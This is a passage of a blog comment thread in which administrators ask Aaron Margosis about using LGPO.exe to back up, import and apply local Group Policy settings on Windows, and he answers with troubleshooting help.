        security packages reg_multi_sz kerberous\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\accessproviders
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\audit
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\centralizedaccesspolicies
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\credssp
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\data
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\fipsalgorithmpolicy
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\gbg
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\jd
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\kerberos
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\msv1_0
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\osconfig
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\skew1
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sso
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sspicache

        1. RobertEarl says:

          It appears to be fullprivilegeauditing. If I set that to 00 instead of 3000, LGPO completes the backup without error.

          [Aaron Margosis] Wow. I never saw an instance where that REG_BINARY value was more than one byte, and LGPO.exe corrects only for a misconfigured single byte. Have you seen this on other systems or just this one?
          1. RobertEarl says:

            It seems to be that way on all of you workstations. What is it for? Is it something that has been improperly set in a group policy?

            [Aaron Margosis] From everything I can tell, it should be just one byte — not two or more — and the value should be 0x00 or 0x01. I’ve seen it get set to 0x80 in v1507 and v1511, which causes Auditpol.exe to fail. I haven’t seen it set to anything else, nor heard of that happening. Perhaps the best approach is to use auditpol.exe /set one time across all machines to set it to a correct value.
  40. Mark S says:

    Aaron,

    Just a suggestion, but with the pre-release of 2.0 maybe put a link to that in the header summary for easy finding? Especially if you want to start deprecating the 1.0 version.

    Cheers,
    Mark

    [Aaron Margosis] I like the idea, but URLs change all the time.
  41. alej says:

    Hi. great work. When I import GPO policies to a new computer (with LGPO.exe /g path), GPO apply correctly (And appear in gpedit.msc), but in regedit I can not find the key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects

    Where is the new GPO security template imported into regedit? thanks

    [Aaron Margosis] As far as I know, that key is populated only when a Group Policy editor is open, and contains the data that eventually lands in registry.pol files.
  42. Michael Waterman says:

    Hi Aaron,

    Would the lgpo tool be able to process local GPO preferences with the /e option? I’ve created a gpo with a preference that sets a reg key, but I can’t get it to work. Could be me. Hope you can help me out in understanding.

    [Aaron Margosis] LGPO.exe doesn’t support GPP at this time. That looks like it’s going to be a major development effort.
  43. Nick N says:

    It would be great if there was a backup option that went straight to an LGPO text file. My use case is just backing up registry-based LGPO stuff, and I want a nice diffable format. Right now I have to backup to a folder and then parse the .pol files and merge to get a single LGPO text. The LGPO text can be imported, so it would be great to be able to output it as well.

  44. I may have encountered an obscure bug.

    I had instances where `lgpo.exe /t path\lgpo.txt` appeared to not import machine-level settings on a few hosts, and eventually found it was updating \windows\syswow64\grouppolicy\machine\registry.pol rather than \windows\system32\grouppolicy\machine\registry.pol.

    I don’t know how the syswow64 version of registry.pol was created (on only a few machines in my environment), but I’ve found it to be reproducible that if I copy system32\GroupPolicy to syswow64\GroupPolicy, that subsequent runs of lgpo.exe will begin updating the syswow64 version rather than the system32 version of registry.pol.

    I will attempt to workaround by finding and removing syswow64\GroupPolicy\Machine and syswow64\GroupPolicy\User. Are there any cases where a syswow64 copy of the GroupPolicy folder should be kept rather than removed?

    Thanks again Aaron for the great tool, it continues to be useful for me daily!

    1. Another quick test – if the Windows\SysWOW64\GroupPolicy\Machine folder is present, lgpo.exe /t file.inf will create a new registry.pol file in the syswow64 path. So I don’t need an existing registry.pol file, just the existence of a SysWOW64\GroupPolicy\Machine folder is enough to trigger this issue for me.

      [Aaron Margosis] LGPO.exe is an x86 executable, so it could be redirected from System32 to SysWOW64 – it will certainly load DLLs from SysWOW64 rather than System32. But it uses documented Windows interfaces and doesn’t look for the System32\GroupPolicy folder explicitly, so my guess is that this is a Windows anomaly rather than anything specific to LGPO.exe. Are there any “normal” situations in which a SysWOW64\GroupPolicy directory might get created?
  45. Christoph Hacker says:

    Hi!
    Thanks for the great work!
    But…
    How do I export MLGPOs on a Win10Enterprise Machine and how do I import them, or create an GPOPack (which are the compatible files, which need to be included in the export directory… GPOPack.wsf/LocalPol.exe/LocalSecurityDB.sdb?)?
    I would highly appreciate an answer to solve this week-lasting problem. 🙂

    [Aaron Margosis] Backup of MLGPO is going to be somewhat manual. E.g., copy out the registry.pol someplace, or convert it to “LGPO text” using LGPO.exe /parse /ua or /un. Apply it to a new system in the reverse manner: LGPO.exe /t lgpo-text-file, or LGPO.exe /ua path-to-registry.pol. FWIW, I don’t think LocalGPO.wsf handled backup/restore of MLGPO either.

    Oh, and you need LGPO v2 for this. https://blogs.technet.microsoft.com/secguide/2016/09/23/lgpo-exe-v2-0-pre-release-support-for-mlgpo-and-reg_qword/

  46. Patrick Nuckle says:

    Hi, I’m trying to disable Windows 10’s Cortana using the text policy file below.

    Computer
    SOFTWARE\Policies\Microsoft\Windows\Windows Search
    AllowCortana
    DWORD:0

    The command that I’m using is lgpo.exe /t cortana.txt /v

    The Result is this:
    Apply registry-based settings from LGPO text file: cortana.txt
    PROCESSING INPUT FILE FOR REGISTRY-BASED POLICY: cortana.txt

    Computer Config SOFTWARE\Policies\Microsoft\Windows\Windows Search AllowCortana REG_DWORD 0

    The problem is that the policy never seems to actually get applied if I check the registry or using gpedit.
    Am I missing something?

    Thanks

    [Aaron Margosis] Is there a domain policy overriding the local policy?
    1. Patrick Nuckle says:

      Hi Aaron, I’m just getting back into trying to configure policies again. I looked into Domain policies but I don’t think that’s the case. I’m rolling out Win 10 Enterprise x64 1703 and LGPO policies just don’t take effect. We have 2 domains. I tried our new one, our old one, I tried different OUs, and I tried totally taking the client machine out of the domain, nothing works. The weird thing is that I have another Win 10 machine that’s part of our old domain. That one was setup manually and is build 1607. Any idea what could be going on? The group policy operational log reports error event 7016 when I run the command.

      1. Patrick Nuckle says:

        I didn’t complete my statement above, the machine that was rolled out “manually” does apply my Cortana policy successfully using LGPO.EXE.

  47. Roger says:

    I have installed the Windows-10-RS1 and Server 2016-Baselines which use LGPO for their installation. When I install the Member server, I see the custom templates referenced in the article (eg. MS Security Guide) when I run Gpedit.msc. When I do the same thing on a W10 1607 LTSB system, I see nothing in GPEdit. The strange part is that the settings are actually there. Specifically the “Apply UAC restrictions to local accounts on network logons” is enabled if I check the registry. Also if I change the registry to zero and then reboot, it is set back to 1. Am I missing something or do Custom Templates just not show in the client GP Editor? If not how to I change the policies or use the other legacy policies that have been added? Thanks

    [Aaron Margosis] For the client editor bit: are you sure the custom ADMX and ADML were copied into the correct PolicyDefinition directories? For the registry editing: that’s not surprising – when the GPO applies again after reboot, it will overwrite any manual registry edits.
  48. UkiwiS says:

    I’m struggling with this.

    I have 10-12 settings I want to deploy to a machine. Prior to importing I take a backup which has no configured settings. I then import my settings from a folder and I can see that they are present using GPedit. Now, if I want to remove these settings I feel that I should simply be able to restore or import the previous backup but I’m seeing that, If I perform the restore I see no change. I’ve run “gpupdate /target:computer /force” and I’ve even rebooted but the settings remain. What am I missing?

    [Aaron Margosis] Local-GPO backup is of limited use. I added this paragraph to the v2.2 documentation:

    ALSO NOTE: if you apply settings to local policy and then export local policy, the security template and advanced auditing portions of the exported policy will almost certainly be different from the policy you applied. “Auditpol.exe /backup” reports all advanced auditing settings, not just the ones you applied. Similarly, “secedit.exe /export” reports most local security settings whether they were defaults, applied through a security template, or changed through other means. Secedit.exe also has some other quirks. For example, it won’t report user rights assignments that are empty, and reports only a subset of the sections that might appear in a security template. It won’t report file security settings, registry security settings, service settings, or restricted groups. For these reasons, local policy backups might be of limited value.

  49. GhostKU says:

    It looks like I found the thing I that I need, but it is too difficult to me.
    I need to disable One Drive, so I need to set
    “Computer Configuration > Administrative Templates > Windows Components > OneDrive>Prevent the usage of OneDrive for file storage” policy to “Enabled”
    How can I do that with LGPO.exe?
    Thanks

    [Aaron Margosis] On a vanilla system with no local policies, apply that one setting using gpedit.msc. Get the registry.pol file from System32\GroupPolicy\Machine. Use that with LGPO.exe, or parse it to LGPO-text using “lgpo.exe /parse /m registry.pol” and use that resulting text.
  50. Achim says:

    Where can I download the version 2 of the LGPO tool supporting Windows Server 2016? I can’t find a download link.

Skip to main content